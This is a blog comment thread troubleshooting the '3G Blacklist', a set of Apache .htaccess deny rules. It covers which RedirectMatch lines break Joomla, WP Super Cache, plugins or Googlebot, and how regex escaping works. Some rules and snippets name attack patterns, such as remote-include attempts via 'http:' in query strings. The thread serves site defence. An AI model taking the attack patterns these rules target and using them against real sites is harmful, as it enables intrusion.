As for the various validators, they should still be able to access your pages. The RedirectMatch 403 \/\/ directive is actually targeting the main part of the URL itself and does not block anything in the query string. Additionally, the blacklist is only blocking requests for URLs that are a part of your domain; their appending your page URL to their URL would only be affected if they were using the blacklist on their own domain (which I’m sure they’re not). Nonetheless, I have seen this issue before with the directives used in the Ultimate htaccess Blacklist, so you may want to check that possibility as well.
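To illustrate the path-versus-query-string distinction, here is a minimal sketch. It is not the blacklist's exact rule set, and the query-string pattern is only an example. RedirectMatch in mod_alias tests its pattern against the URL path alone, whereas anything after the "?" has to be matched with mod_rewrite's QUERY_STRING variable:

```apache
# Sketch only: contrasts URL-path matching with query-string matching.

# mod_alias: the pattern is tested against the URL path only, so a
# request such as /page.php?u=http://example.com/ is NOT caught here,
# even though its query string contains a double slash.
<IfModule mod_alias.c>
 RedirectMatch 403 \/\/
</IfModule>

# mod_rewrite: QUERY_STRING holds everything after the "?".
# The "http\:" pattern is an illustrative choice.
<IfModule mod_rewrite.c>
 RewriteEngine On
 RewriteCond %{QUERY_STRING} http\: [NC]
 RewriteRule .* - [F,L]
</IfModule>
```

With both blocks in place, a double slash in the path is refused by the first rule, and a remote-include attempt in the query string is refused by the second.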

[ Gravatar Icon ]

Fred#53

Hi, I followed a link to this article and have been reading up on the 3G Blacklist. I copied the file and pasted it first into my configuration, but the server wouldn’t load, so I tried it in the .htaccess and got Forbidden: Access Permission Denied.

I then started removing lines.
RedirectMatch 403 \
Only when I remove these two lines does the site load, but it still will not work from my configuration file.

I’m new to all of this. Any suggestions, and is it OK to leave these out?

Thanks

Fred

[ Gravatar Icon ]

Jeff Starr#54

@Fred: By all means, remove any lines that cause your server to crash. Unfortunately, when it comes to blacklisting, it is practically impossible to forge a “one-size-fits-all” strategy. For the most part, the blacklist works great out of the box, but various server/site configurations may require some fine-tuning. To do so, simply comment out or remove the offending lines and you should be good to go. Each of the different RedirectMatch directives operates independently, so removing any one of them simply disables the particular character-string match that it is intended to block. In other words, the blacklist will still protect against all types of attacks represented by the remaining directives.

[ Gravatar Icon ]

Fred#55

Jeff, thanks for the response, and I appreciate the comments. I have a couple of sites running off the same server, and these bots really overload my server with the frequency at which they load pages. Because I have access to root, I’m able to httpd.reload and free resources up. For the next few days I will closely monitor to see the results.

Again, Many Thanks

Fred

[ Gravatar Icon ]

Tony#56

Sorry for the delay, it’s been a very busy week!

I found out that even though I could access my blog and everything is working fine, the validators couldn’t access it because of “RedirectMatch 403 \/\/” when WP Super Cache is enabled. If any one of them is disabled, then everything works fine.

Thanks again Jeff for this great list!

[ Gravatar Icon ]

Sebastian#57

Thanks for your work.

For Joomla 1.0.15 I needed to disable:
# RedirectMatch 403 \/\/
# RedirectMatch 403 \/includes\/

First rule is very site specific as tinyMCE inserted images with a double //
Second rule had prevented loading of some of the js scripts needed for administration. (eg. Save / Close links not working).

[ Gravatar Icon ]

Jeff Starr#58

@Sebastian: Thank you — this information will be integrated into the next version of the blacklist, which hopefully will be bubbling its way to the surface here very soon..

[ Gravatar Icon ]

Otto#59

Jeff, thanks for sharing the 3G list. One thing I noticed is that the character strings group blocked some of my pages. The 3G lines in question were:

# RedirectMatch 403 news\.php
# RedirectMatch 403 contact\.php

I am probably not the only one who named the pages in a more “traditional” way, such as contact.php. Any reason why these pages should be blocked?
Otto

[ Gravatar Icon ]

Jeff Starr#60

@Otto: Of course, comment out or remove any lines that prevent access to actual pages on your site. The two pages you mention are very common and thus frequently targeted by attackers. If the pages actually exist, the number of misdirected site errors will decrease; however, variations on the file names in question will persist.

[ Gravatar Icon ]

Mike#61

Thanks for the list. I am running a 1.5.8 Joomla! site (and am not technical, but have read up all I can about security). I installed it in its entirety and it stops me accessing admin, but I just temporarily remove the # RedirectMatch 403 \/\/ line using sftp, then reset it when I am finished.
1) Is it possible to exclude a certain directory &/or file but pick up others?
2) Why does the # RedirectMatch 403 \/includes\/ command appear to have no impact in FF3 but cause an error message to appear in IE7 which states “Overlib 4.10…..”? This occurs when the events calendar is opened and moused over. I think I have traced the code, and the reason it should error is a call to an overlib JavaScript file which is in the directory “public_html/includes/js/”. The routine is by no means essential, but it bugs me not understanding why.
Does this mean that FF3 handles this in a different way or is it that maybe the command is in fact being ignored in FF3?

FYI I added another robot “Twiceler” (something to do with a Uni in USA) that was hammering my site to your blacklist. I do believe it is malicious but heavy on resources. It stopped it in its tracks.
I am looking forward to your next blacklist.
Thanks again.
Regards,
Mike

[ Gravatar Icon ]

Jeff Starr#62

@Mike: For the first question, check out Apache’s Files and FilesMatch directives. They may be used to target specific files and/or file types, and there are additional, similar directives for targeting specific types of requests as well.
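As a rough sketch of what those two directives look like in practice: the file name and extensions below are hypothetical, and the access-control lines assume Apache 2.2 syntax (on Apache 2.4 the Order/Deny pair would be replaced by "Require all denied").

```apache
# Sketch only: file names and extensions are hypothetical examples.

# Target one specific file by name.
<Files "secret-notes.txt">
 Order allow,deny
 Deny from all
</Files>

# Target a whole group of files with a regular expression.
<FilesMatch "\.(inc|bak)$">
 Order allow,deny
 Deny from all
</FilesMatch>
```

Both containers match on the file name rather than the full URL, so they apply wherever a matching file lives beneath the directory holding the .htaccess file.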

For your second question, different browsers handle requests for JavaScript according to different algorithms. I wish I knew the specifics of their protocols for this, but unfortunately this information falls outside of my area of expertise. To retain the functionality of any files that are otherwise blocked by the blacklist, simply comment out the interfering directives in the blacklist. The remaining rules in the blacklist will continue to function perfectly well.

And.. thanks for the heads up on the Twiceler bot — I will definitely be adding it to the blocked user agent section of the upcoming 4G Blacklist.

Thanks for the great feedback!
Cheers,
Jeff

[ Gravatar Icon ]

Mike#63

Jeff,
Thx for the quick response, I will see what I can make of the suggested directives, at 1st glance they appear double Dutch.

Just to clarify about Twiceler, I meant to state I did NOT think it was malicious, but was hammering my site. I found a ref to it at the following http://www.tngforum.us/lofiversion/index.php?t2746.html

Regards,
Mike

[ Gravatar Icon ]

sleepy22#64

Hello,

I have a private site, and I don’t want any bots clogging up my log files. I want to block all of the following GET strings:

"GET /robots.txt
"GET / HTTP/
"GET /images
"GET /favicon.ico

Can anyone help me with the exact code I need for the htaccess file to deny the above commands?

I only want to allow real users who type an exact url address or enter by following a specific URL link to my site.

Thanks
Sleepy22

[ Gravatar Icon ]

Alex#65

Hi and thanks for all your hard work.

I’ve just popped the 3g Blacklist into my .htaccess file, and everything seems OK.

However, the Featurific plugin no longer does its thing http://featurific.com/ffw

Any idea what’s up?

Cheers,

Alex

And you have some lovely juicy stuff here!

[ Gravatar Icon ]

Jeff Starr#66

@Alex: Not sure, but I have downloaded a copy of the plugin and will investigate this weekend. Hopefully something will jump out at me. I will report back here early next week with my findings. Stay tuned..

[ Gravatar Icon ]

Tony#67

Hi Jeff, and all!

I had some troubles with Google after using the 3G Blacklist. I wasn’t sure it’s because of it, so I didn’t write here. But I guess it’s something worth investigating. Google deindexed my little blog, every single article about 2 months ago, and all I could find about it in Google Webmaster tools was that there was a 4xx (yes, just 4xx, nothing specific!) error when googlebot tried accessing the blog. I have another blog on the same server that wasn’t affected, and that blog didn’t have the 3G Blacklist in the .htaccess.

After deleting the 3G entries, googlebot accessed my site, and slowly started reindexing all of the articles.

I wasn’t archiving my monthly logs then (now I do), so I can’t know what really happened! But that unhelpful “4xx error” from Google really drove me crazy!!!

Jeff, please let me know if there’s any way I can find out anything about this problem. For the 4G Blacklist’s sake! I’ll setup a new blog and use the 3G on it if needed.

[ Gravatar Icon ]

Alex#68

Thanks for looking into this Jeff, and for the quick response.

I look forward to hearing your thoughts.

While you are on - do you think munging the name section of the comments code will kill off spam bots?

<input type="text" name="email" id="email" value="" size="22" tabindex="2" />
Mail (will not be published)

And yes, I am not the world’s greatest coder!

Cheers and thanks,

Alex

[ Gravatar Icon ]

Jeff Starr#69

@Tony: Yikes, I haven’t heard of anything like that happening before. Could you share a few of the URLs that were dropped from Google because of the 4xx error? This would enable me to look for a pattern or other reason why this may have happened. There are many things that can cause generic 4xx errors, but if the Blacklist was blocking access to all of your posts, then it may certainly be the culprit (but I hope not). Drop some of those URLs and let’s have a look.

@Alex: Interesting idea, but probably not effective, especially against spambots that bypass the form altogether and just hit the comments.php (or whatever) directly.

[ Gravatar Icon ]

Tony#70

Jeff, that was in December, and all of the articles disappeared then, but are back in Google’s index now. I didn’t want to say anything because I wasn’t sure, and nobody here had any problems. I should have emailed you I guess. Here are a couple of links:

http://www.bikeshake.com/pv-glider-mini-glider-balance-bike-review/
http://www.bikeshake.com/giro-hex-mountain-bike-helmet-review/

Maybe some plugin interfered, or maybe wasn’t compatible with the 3G. FYI, I used Super Cache then, which is temporarily deactivated now.

I hope you find the culprit. I really am waiting for the 4G Blacklist, and really want to taste it! :-)

Thanks in advance!

[ Gravatar Icon ]

Jeff Starr#71

@Tony: Ah, Super Cache. That would explain it. Check this out:

http://blog.nerdstargamer.com/2008/05/30/perishable-press-3g-blacklist-and-wp-super-cache/

And, even better than Alissa’s fix is the fact the Super Cache plugin is reported to have fixed their HTAccess code.

[ Gravatar Icon ]

Tony#72

Jeff,

The thing is, I had read all of the comments here, and Alissa’s post, before I pasted the 3G in my htaccess. And I also commented here a few months back about Super Cache not conflicting. Apparently only googlebot had problems accessing my site. Who knows, maybe it was drunk for a few days then? :-D

[ Gravatar Icon ]

Jeff Starr#73

@Tony: Not sure then. The issue you describe is unique — this is the first I am hearing of anything like this in nearly a year since the 3G Blacklist was released. Looking at the general format of your URLs, there doesn’t seem to be anything that inadvertently would be blocked. But even so, the possibility does exist that the list was somehow involved, perhaps by conflicting with another process or script used by the site or server. Definitely strange though, whatever happened.

[ Gravatar Icon ]

Jeff Starr#74

@Alex: Hey I checked out that plugin and it looks like there is a file that is being blocked by the 3G Blacklist, namely htmlparser.inc. This should be resolved easily by commenting out the following line:

RedirectMatch 403 \.inc

That should do the trick. Let me know how it goes!
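If disabling the rule entirely feels too broad, one possible alternative is to keep it and carve out the single file. This is only a sketch and has not been tested against the plugin. It assumes an Apache build that uses PCRE, which supports fixed-width negative lookbehind:

```apache
# Sketch only: assumes PCRE-style regular expressions.
<IfModule mod_alias.c>
 # Original rule, commented out:
 # RedirectMatch 403 \.inc

 # Block ".inc" unless it is immediately preceded by "htmlparser",
 # so htmlparser.inc stays reachable while other .inc files are refused.
 RedirectMatch 403 (?<!htmlparser)\.inc
</IfModule>
```

The lookbehind only inspects the ten characters before ".inc", so any file whose name ends in "htmlparser.inc" is exempted as well.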

[ Gravatar Icon ]

jidanni#75

Surely not every backslash here and in building-the-3g-blacklist-part-1 etc. are needed.

I sense you have gone hog wild on the backslashes, for fear of the unknown.

[ Gravatar Icon ]

Jeff Starr#76

I’m going to have to call your bluff on this one, jidanni — exactly which characters do not need to be escaped with a backslash?

[ Gravatar Icon ]

jidanni#77

I spent ten whole minutes in emacs,
(rgrep "backslash" "*" "/usr/share/doc/apache2-doc/manual/en/")
(rgrep "escape" "*" "/usr/share/doc/apache2-doc/manual/en/")
(w3m-goto-url "http://www.google.com/search?q=apache+backslash+escape" nil nil)
but couldn’t dig up the exact list. So… \y\o\u \w\i\n\\.

[ Gravatar Icon ]

Jeff Starr#78

Nor could I, thus the reason for the overly cautious application of escape characters. “Better safe than sorry” is sound advice, especially when dealing with anything involving HTAccess. Nice try though. ;)

[ Gravatar Icon ]

jidanni#79

OK, added Bug 46782 - list of what characters need to be escaped is hard to find
https://issues.apache.org/bugzilla/show_bug.cgi?id=46782

[ Gravatar Icon ]

Jeff Starr#80

Nice. Keep me posted — would be great to clean things up a bit..

[ Gravatar Icon ]

jidanni#81

Well, as you can see on the bug, they chucked it in the garbage.

[ Gravatar Icon ]

Jeff Starr#82

Yes, but I did notice their advice to escape regular expressions as such, which has been my modus operandi when dealing with HTAccess. At least they didn’t keep you waiting for a week before responding.

[ Gravatar Icon ]

jidanni#83

OK, we find
Apache uses Perl Compatible Regular Expressions provided by the PCRE library.
which
$ man perlre
perlre - Perl regular expressions
should tell the deal.
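For what it is worth, the Perl and PCRE documentation say that a backslash in front of any non-alphanumeric character always yields that literal character. Under that reading (and assuming an Apache build that uses PCRE), the cautious escapes are harmless but optional for ordinary punctuation, while the dot is one character where the backslash changes the meaning. A short sketch:

```apache
# Sketch only: assumes PCRE semantics.

# Equivalent pairs: ":" and "/" are not metacharacters,
# so the backslash is redundant but safe.
RedirectMatch 403 \:
RedirectMatch 403 :

RedirectMatch 403 \/\/
RedirectMatch 403 //

# NOT equivalent: an unescaped "." matches any character,
# so the second form would also match strings such as "xinc".
RedirectMatch 403 \.inc
RedirectMatch 403 .inc
```

Each pair is shown only for comparison. A real file would keep one form of each rule.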
